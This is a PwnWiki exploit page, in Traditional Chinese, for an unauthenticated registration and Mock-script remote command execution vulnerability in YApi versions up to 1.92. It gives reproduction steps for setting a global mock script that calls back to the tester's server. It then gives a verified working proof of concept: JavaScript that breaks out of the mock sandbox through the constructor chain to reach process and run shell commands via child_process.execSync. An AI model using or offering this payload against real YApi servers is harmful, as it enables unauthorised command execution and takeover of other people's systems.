YApi 未授權用戶創建&Mock遠程命令執行漏洞

From PwnWiki
Revision as of 15:41, 10 July 2021 by Pwnwiki (talk | contribs) (Created page with "添加接口,訪問接口的mock地址")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎ • ‎中文(繁體)‎
Check.png 該漏洞已通過驗證

本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。

影響版本

<=V1.92 All

漏洞復現

登錄註冊後,創建一個項目

124460388-eaa46100-ddc1-11eb-80c4-2bddb97df8e1.png

然後選擇設置全局的mock腳本,設置命令為遠程訪問我的服務器地址。

124460511-090a5c80-ddc2-11eb-92f6-46c9b3b498bb.png

添加接口,訪問接口的mock地址

124460629-2dfecf80-ddc2-11eb-98c3-b96f7174d8f1.png

服務器可以看到如下響應 124460757-5686c980-ddc2-11eb-87df-09e0f9ac08af.png


POC

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockjson = process.mainModule.require("child_process").execSync("command").toString()

參考

https://github.com/YMFE/yapi/issues/2233

Retrieved from "https://pwnwiki.com/index.php?title=YApi_未授權用戶創建%26Mock遠程命令執行漏洞/zh-hant&oldid=6892"